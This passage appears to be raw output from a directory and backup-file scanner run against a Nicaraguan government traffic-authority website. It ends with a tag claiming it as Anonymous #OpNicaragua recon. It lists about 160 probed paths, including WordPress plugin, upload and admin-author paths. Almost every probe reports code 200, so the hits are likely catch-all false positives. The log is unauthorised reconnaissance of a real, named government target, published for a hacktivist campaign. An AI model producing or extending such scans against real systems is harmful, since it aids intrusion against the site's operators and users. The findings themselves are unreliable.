2792. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui.bkp
2793. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js~
2794. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js.bkp
2795. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js~
2796. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup.bkp
2797. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/quienes-somos.bkp
2798. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/quienes-somos~
2799. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/scripts.bkp
2800. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json.bkp
2801. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json~
2802. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mision-y-vision~
2803. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mision-y-vision.bkp
2804. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes.bkp
2805. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tramites-y-multas.bkp
2806. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/jefatura-de-transito-y-delegaciones~
2807. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tramites-y-multas~
2808. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes~
2809. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/jefatura-de-transito-y-delegaciones.bkp
2810. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/scripts~
2811. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/regimen-de-circulacion-de-vehiculos.bkp
2812. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/regimen-de-circulacion-de-vehiculos~
2813. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-y-especies-fiscales~
2814. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/de-la-importacion-de-vehiculos-automotores-arto-164~
2815. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial~
2816. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/recomendaciones-generales.bkp
2817. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-y-especies-fiscales.bkp
2818. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial.bkp
2819. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/temas-y-contenidos-de-estudio.bkp
2820. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/temas-y-contenidos-de-estudio~
2821. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/prevencion-vial~
2822. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/recomendaciones-generales~
2823. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisito-alumno-egresado-de-escuela-de-manejo~
2824. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/de-la-importacion-de-vehiculos-automotores-arto-164.bkp
2825. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/educacion-vial/prevencion-vial.bkp
2826. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisito-alumno-egresado-de-escuela-de-manejo.bkp
2827. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/talleres.bkp
2828. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/talleres~
2829. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/estadisticas.bkp
2830. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad.bkp
2831. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/ingenieria-vial.bkp
2832. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/ingenieria-vial~
2833. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015/07.bkp
2834. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/estadisticas~
2835. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tipos-de-accidentes.bkp
2836. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/tipos-de-accidentes~
2837. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/funcion-de-regulacion-vial.bkp
2838. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015/07~
2839. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads.bkp
2840. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/funcion-de-regulacion-vial~
2841. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads~
2842. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad~
2843. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisitos-y-tramites.bkp
2844. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/requisitos-y-tramites~
2845. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/boleta-amarilla-y-roja~
2846. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/procedimientos-por-tipo-de-accidente.bkp
2847. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/suspension-y-cancelacion-de-licencias~
2848. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/valor-de-multas-por-infracciones-de-transito.bkp
2849. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/valor-de-multas-por-infracciones-de-transito~
2850. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/autorizacion-de-escuela-de-manejo-e-instructores~
2851. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/boleta-amarilla-y-roja.bkp
2852. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/autorizacion-de-escuela-de-manejo-e-instructores.bkp
2853. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/procedimientos-por-tipo-de-accidente~
2854. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/escuelas-de-manejo-autorizadas.bkp
2855. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/escuelas-de-manejo-autorizadas~
2856. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015.bkp
2857. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/suspension-y-cancelacion-de-licencias.bkp
2858. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2015~
2859. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-e-infracciones.bkp
2860. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/contactanos~
2861. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/denuncias~
2862. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/contactanos.bkp
2863. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/denuncias.bkp
2864. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/aranceles-e-infracciones~
2865. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1198.bkp
2866. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/02.bkp
2867. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author/admin.bkp
2868. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/02~
2869. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1176.bkp
2870. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/08~
2871. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1198~
2872. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1176~
2873. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/08.bkp
2874. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author/admin~
2875. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author.bkp
2876. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014.bkp
2877. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1162~
2878. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos.bkp
2879. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1162.bkp
2880. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos~
2881. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/2.bkp
2882. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1189~
2883. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/author~
2884. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1189.bkp
2885. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1172.bkp
2886. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/3.bkp
2887. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014~
2888. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/2~
2889. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1172~
2890. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page/3~
2891. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page.bkp
2892. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/09.bkp
2893. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/09~
2894. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/page~
2895. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-apelar-una-multa~
2896. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-apelar-una-multa.bkp
2897. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/06.bkp
2898. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-solicitar-mi-licencia-de-conducir-por-primera-vez.bkp
2899. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/como-solicitar-mi-licencia-de-conducir-por-primera-vez~
2900. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/06~
2901. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/donde-me-tengo-que-dirigir-para-hacer-la-inspeccion-mecanica-y-emision-de-gas~
2902. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/05.bkp
2903. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//platform.twitter.com~
2904. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//platform.twitter.com.bkp
2905. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/donde-me-tengo-que-dirigir-para-hacer-la-inspeccion-mecanica-y-emision-de-gas.bkp
2906. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/uploads/2014/05~
2907. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1192.bkp
2908. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1192~
2909. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1160.bkp
2910. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1179.bkp
2911. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1160~
2912. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1195.bkp
2913. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1195~
2914. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/js.bkp
2915. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/js.bkp
2916. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/archivos/1179~
2917. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js~
2918. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/js~
2919. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/js~
2920. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js.bkp
2921. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/a.bkp
2922. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx.bkp
2923. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx~
2924. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/a~
2925. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mailman~
2926. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/SQLQHit.asp~
2927. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/SQLQHit.asp.bkp
2928. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search.bkp
2929. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mailman.bkp
2930. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad/feed~
2931. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search~
2932. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json/oembed/1.0.bkp
2933. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad/feed.bkp
2934. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Restriction.php.bkp
2935. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json/oembed/1.0~
2936. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Restriction.php~
2937. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Registry.php~
2938. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Registry.php.bkp
2939. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Net.bkp
2940. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Net~
2941. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/gzdecode.php.bkp
2942. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/gzdecode.php~
2943. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff.php~
2944. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff.php.bkp
2945. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff~
2946. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff.bkp
2947. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/XML~
2948. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/function.require-once.bkp
2949. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/XML.bkp
2950. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/function.require-once~
2951. #######################################################################################################################################
2952. Anonymous #OpNicaragua JTSEC Full Recon #17